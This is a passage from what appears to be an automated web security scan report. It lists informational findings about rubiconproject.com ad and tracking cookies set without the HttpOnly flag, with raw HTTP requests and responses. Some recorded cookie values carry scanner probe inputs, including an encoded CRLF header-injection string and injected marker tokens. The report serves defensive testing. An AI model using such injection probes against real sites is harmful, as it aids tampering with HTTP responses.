csi15=3188306.js^1^1315404900^1315404900&3151650.js^1^1315404889^1315404889&3196947.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; ses15=12338^10&12590^8; rdk=7725/12338; rdk2=0; ses2=12338^16&12590^6; csi2=3165011.js^3^1315404895^1315405144&3151648.js^2^1315404875^1315404931&3196945.js^2^1315404874^1315404931&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061

Response

9.32. http://optimized-by.rubiconproject.com/a/7725/12338/22678-2.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7725/12338/22678-2.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rdk=7725/12338; expires=Wed, 07-Sep-2011 15:21:37 GMT; max-age=60; path=/; domain=.rubiconproject.com
rdk2=04e8588ddb08ddb10f49af8be; expires=Wed, 07-Sep-2011 15:21:37 GMT; max-age=10; path=/; domain=.rubiconproject.com
ses2=12338^40&12590^82; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63502; path=/; domain=.rubiconproject.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7725/12338/22678-2.js?cb=89263094&keyword=ndm|business.businessold HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/business/business-old/fraud-blackmail-in-latest-oswal-claims/story-e6frg2qu-1226131700884
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; cd=false; lm="7 Sep 2011 14:14:54 GMT"; csi15=3188306.js^1^1315404900^1315404900&3151650.js^1^1315404889^1315404889&3196947.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; csi2=3151648.js^2^1315404875^1315404931&3196945.js^2^1315404874^1315404931&3165011.js^2^1315404895^1315404918&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; ses15=12338^10&12590^8; rdk=7725/12338; rdk2=0; ses2=12338^15&12590^6

Response

9.33. http://optimized-by.rubiconproject.com/a/7725/12338/22682-15.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7725/12338/22682-15.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rdk=7725/12338; expires=Wed, 07-Sep-2011 15:14:48 GMT; max-age=60; path=/; domain=.rubiconproject.com
rdk15=04e8588dd8e11c55ed6b14ad2; expires=Wed, 07-Sep-2011 15:14:48 GMT; max-age=10; path=/; domain=.rubiconproject.com
ses15=12338^113&12590^132; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63911; path=/; domain=.rubiconproject.com
csi15=3188306.js^1^1315404888^1315404888&3151966.js^3^1315404887^1315404888&3152309.js^12^1315404884^1315404887&3220315.js^1^1315404885^1315404885&3165015.js^3^1315404883^1315404884&3178849.js^1^1315404882^1315404882&3151650.js^2^1315404881^1315404882&3196947.js^2^1315404881^1315404881&3226141.js^1^1315404881^1315404881&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; expires=Wed, 14-Sep-2011 14:14:48 GMT; max-age=604800; path=/; domain=.rubiconproject.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7725/12338/22682-15.js?cb=99484313&keyword=ndm|news.weather HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://weather.news.com.au/wa/perth/perth
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; csi15=3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; ses15=12338^2&12590^2; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; rdk=7856/12590; rdk2=0; ses2=12338^3&12590^1; csi2=3196945.js^1^1315404874^1315404874&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; cd=false; au=GSAE3LG5-KKTN-10.208.77.156; lm="7 Sep 2011 14:14:35 GMT"

Response

9.34. http://optimized-by.rubiconproject.com/a/7725/12338/22682-2.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7725/12338/22682-2.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rdk=7725/12338; expires=Wed, 07-Sep-2011 15:20:05 GMT; max-age=60; path=/; domain=.rubiconproject.com
rdk2=1c0952%250d%250adc97b2d5930; expires=Wed, 07-Sep-2011 15:20:05 GMT; max-age=10; path=/; domain=.rubiconproject.com
ses2=12338^11&12590^454806; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63594; path=/; domain=.rubiconproject.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

9.35. http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7856/12590/22782-15.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rdk=7856/12590; expires=Wed, 07-Sep-2011 15:19:55 GMT; max-age=60; path=/; domain=.rubiconproject.com
rdk15=04e8588dd97f74c7a98e39cf2; expires=Wed, 07-Sep-2011 15:19:55 GMT; max-age=10; path=/; domain=.rubiconproject.com
ses15=4e8588ddc30f9fd9f878d610^&12590^65&12338^53; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63604; path=/; domain=.rubiconproject.com
csi15=3165015.js^2^1315405194^1315405195&3151969.js^11^1315405176^1315405190&3150144.js^1^1315405186^1315405186&3178849.js^1^1315405181^1315405181&3151650.js^2^1315405172^1315405175&3196947.js^2^1315405168^1315405171&3188306.js^1^1315405169^1315405169&3186719.js^1^1315405168^1315405168&3212309.js^1^1315405167^1315405167&3199969.js^1^1315405166^1315405166; expires=Wed, 14-Sep-2011 14:19:55 GMT; max-age=604800; path=/; domain=.rubiconproject.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

9.36. http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7856/12590/22782-15.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rdk=7856/12590; expires=Wed, 07-Sep-2011 15:30:03 GMT; max-age=60; path=/; domain=.rubiconproject.com
rdk15=04e8588ddd34dd9206cdecba9; expires=Wed, 07-Sep-2011 15:30:03 GMT; max-age=10; path=/; domain=.rubiconproject.com
ses15=12338^76&12590^78; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=62996; path=/; domain=.rubiconproject.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

9.37. http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7856/12590/22782-2.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rdk=7856/12590; expires=Wed, 07-Sep-2011 15:31:51 GMT; max-age=60; path=/; domain=.rubiconproject.com
rdk2=04e8588ddb95b3c4623aa79e6; expires=Wed, 07-Sep-2011 15:31:51 GMT; max-age=10; path=/; domain=.rubiconproject.com
ses2=4e8588dd3e9c0c4d453ad2c4^&12338^15&12590^1; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=62888; path=/; domain=.rubiconproject.com
csi2=3151964.js^2^1315405891^1315405911&3152310.js^3^1315405830^1315405906&3151648.js^2^1315405815^1315405861&3196945.js^2^1315405767^1315405804&3165011.js^3^1315405775^1315405790&3199967.js^1^1315405763^1315405763; expires=Wed, 14-Sep-2011 14:31:51 GMT; max-age=604800; path=/; domain=.rubiconproject.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

9.38. http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7856/12590/22893-15.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rdk=7856/12590; expires=Wed, 07-Sep-2011 15:21:07 GMT; max-age=60; path=/; domain=.rubiconproject.com
rdk15=04e8588ddd34dd9206cdecba9; expires=Wed, 07-Sep-2011 15:21:07 GMT; max-age=10; path=/; domain=.rubiconproject.com
ses15=12338^12&12590^84; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63532; path=/; domain=.rubiconproject.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

9.39. http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7856/12590/22893-15.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rdk=7856/12590; expires=Wed, 07-Sep-2011 15:15:31 GMT; max-age=60; path=/; domain=.rubiconproject.com
ses15=12338^5&12590^6; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63868; path=/; domain=.rubiconproject.com
csi15=3196947.js^2^1315404889^1315404931&3188306.js^1^1315404900^1315404900&3151650.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; expires=Wed, 14-Sep-2011 14:15:31 GMT; max-age=604800; path=/; domain=.rubiconproject.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

9.40. http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7856/12590/22893-2.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rdk=7856/12590; expires=Wed, 07-Sep-2011 15:30:37 GMT; max-age=60; path=/; domain=.rubiconproject.com
rdk2=04e8588ddb95b3c4623aa79e6; expires=Wed, 07-Sep-2011 15:30:37 GMT; max-age=10; path=/; domain=.rubiconproject.com
ses2=4e8588dd3e9c0c4d453ad2c4^&12338^1&12590^1; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=62962; path=/; domain=.rubiconproject.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

9.41. http://optimized-by.rubiconproject.com/a/dk.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/dk.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rdk=7856/12590; expires=Wed, 07-Sep-2011 15:15:31 GMT; max-age=60; path=/; domain=.rubiconproject.com
ses15=12338^5&12590^5; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63868; path=/; domain=.rubiconproject.com
csi15=3151650.js^2^1315404889^1315404931&3188306.js^1^1315404900^1315404900&3196947.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; expires=Wed, 14-Sep-2011 14:15:31 GMT; max-age=604800; path=/; domain=.rubiconproject.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

9.42. http://optimized-by.rubiconproject.com/a/dk.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/dk.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rdk=7856/12590; expires=Wed, 07-Sep-2011 15:14:48 GMT; max-age=60; path=/; domain=.rubiconproject.com
ses2=12338^119&12590^2; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63911; path=/; domain=.rubiconproject.com
csi2=3151648.js^1^1315404888^1315404888&3152310.js^1^1315404888^1315404888&3165011.js^3^1315404888^1315404888&3196945.js^1^1315404887^1315404887&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^268308726; expires=Wed, 14-Sep-2011 14:14:48 GMT; max-age=604800; path=/; domain=.rubiconproject.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/dk.js?defaulting_ad=i33333331362D317332.js&size_id=2&account_id=7856&site_id=12590&size=728x90&cb=0.42522372608073056 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.html?cb=0.5778487676288933&keyword=wa/news_home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; csi15=3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; ses15=12338^2&12590^2; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; rdk=7856/12590; rdk2=0; ses2=12338^3&12590^1; csi2=3196945.js^1^1315404874^1315404874&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061

Response

9.43. http://pixel.rubiconproject.com/tap.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.rubiconproject.com
Path:	/tap.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264554%3D1; expires=Fri, 07-Oct-2011 14:14:17 GMT; path=/; domain=.rubiconproject.com
rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C0%2C1%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C0%2C1%2C%2C%265671%3D14742%2C0%2C2%2C%2C%264554%3D14742%2C0%2C1%2C%2C; expires=Fri, 07-Oct-2011 14:14:17 GMT; path=/; domain=.pixel.rubiconproject.com
put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; expires=Mon, 05-Mar-2012 14:14:17 GMT; path=/; domain=.rubiconproject.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

9.44. http://pixel.rubiconproject.com/tap.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.rubiconproject.com
Path:	/tap.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%262874c0bb165b2b12e25b9caf%3D1%265328%3D1; expires=Fri, 07-Oct-2011 14:14:35 GMT; path=/; domain=.rubiconproject.com
rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C86%2C2%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C0%2C1%2C%2C%265671%3D14742%2C0%2C1%2C%2C%262874c0bb165b2b12e25b9caf%3D14742%2C0%2C1%2C%2C%265328%3D14742%2C0%2C1%2C%2C; expires=Fri, 07-Oct-2011 14:14:35 GMT; path=/; domain=.pixel.rubiconproject.com
put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; expires=Fri, 06-Sep-2013 14:14:35 GMT; path=/; domain=.rubiconproject.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

9.45. http://pixel.rubiconproject.com/tap.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.rubiconproject.com
Path:	/tap.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1; expires=Fri, 07-Oct-2011 14:14:15 GMT; path=/; domain=.rubiconproject.com
rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C0%2C1%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C0%2C1%2C%2C%265671%3D14742%2C0%2C2%2C%2C; expires=Fri, 07-Oct-2011 14:14:15 GMT; path=/; domain=.pixel.rubiconproject.com
put_2081=OO-00000000000000000; expires=Fri, 07-Oct-2011 14:14:15 GMT; path=/; domain=.rubiconproject.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

9.46. http://pixel.rubiconproject.com/tap.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.rubiconproject.com
Path:	/tap.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%262874c0bb165b2b12e25b9caf%3D1%262874c0bb2d7a602682976bca%3D1%2660732874c0bbd63f3fd660e8a1bd%3D1%266073%3D1%265852%3D1; expires=Fri, 07-Oct-2011 14:15:03 GMT; path=/; domain=.rubiconproject.com
rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C86%2C2%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C0%2C1%2C%2C%265671%3D14742%2C0%2C1%2C%2C%262874c0bb165b2b12e25b9caf%3D14742%2C0%2C1%2C%2C%266073%3D14742%2C0%2C23%2C%2C%262874c0bb2d7a602682976bca%3D14742%2C0%2C1%2C%2C%2660732874c0bbd63f3fd660e8a1bd%3D14742%2C0%2C1%2C%2C%265852%3D14742%2C0%2C1%2C%2C; expires=Fri, 07-Oct-2011 14:15:03 GMT; path=/; domain=.pixel.rubiconproject.com
put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; expires=Fri, 07-Oct-2011 14:15:03 GMT; path=/; domain=.rubiconproject.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

9.47. http://pixel.rubiconproject.com/tap.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.rubiconproject.com
Path:	/tap.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%264214%3D1; expires=Fri, 07-Oct-2011 14:14:24 GMT; path=/; domain=.rubiconproject.com
rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C86%2C2%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C0%2C1%2C%2C%265671%3D14742%2C0%2C1%2C%2C%264212%3D14742%2C0%2C1%2C%2C%264214%3D14742%2C0%2C1%2C%2C; expires=Fri, 07-Oct-2011 14:14:24 GMT; path=/; domain=.pixel.rubiconproject.com
put_1197=3620501663059719663; expires=Fri, 07-Oct-2011 14:14:24 GMT; path=/; domain=.rubiconproject.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

9.48. http://pixel.rubiconproject.com/tap.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.rubiconproject.com
Path:	/tap.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1; expires=Fri, 07-Oct-2011 14:14:25 GMT; path=/; domain=.rubiconproject.com
rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C86%2C2%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C0%2C1%2C%2C%265671%3D14742%2C0%2C1%2C%2C%264212%3D14742%2C0%2C1%2C%2C%267935%3D14742%2C0%2C2%2C%2C; expires=Fri, 07-Oct-2011 14:14:25 GMT; path=/; domain=.pixel.rubiconproject.com
put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; expires=Fri, 07-Oct-2011 14:14:25 GMT; path=/; domain=.rubiconproject.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:25 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1; expires=Fri, 07-Oct-2011 14:14:25 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C86%2C2%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C0%2C1%2C%2C%265671%3D14742%2C0%2C1%2C%2C%264212%3D14742%2C0%2C1%2C%2C%267935%3D14742%2C0%2C2%2C%2C; expires=Fri, 07-Oct-2011 14:14:25 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; expires=Fri, 07-Oct-2011 14:14:25 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

9.49. http://pixel.rubiconproject.com/tap.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.rubiconproject.com
Path:	/tap.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%262874c0bb165b2b12e25b9caf%3D1%266073%3D1; expires=Fri, 07-Oct-2011 14:14:35 GMT; path=/; domain=.rubiconproject.com
rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C86%2C2%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C0%2C1%2C%2C%265671%3D14742%2C0%2C1%2C%2C%262874c0bb165b2b12e25b9caf%3D14742%2C0%2C1%2C%2C%266073%3D14742%2C0%2C1%2C%2C; expires=Fri, 07-Oct-2011 14:14:35 GMT; path=/; domain=.pixel.rubiconproject.com
put_2100=usr3fe3ac8db403a568; expires=Fri, 07-Oct-2011 14:14:35 GMT; path=/; domain=.rubiconproject.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:35 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
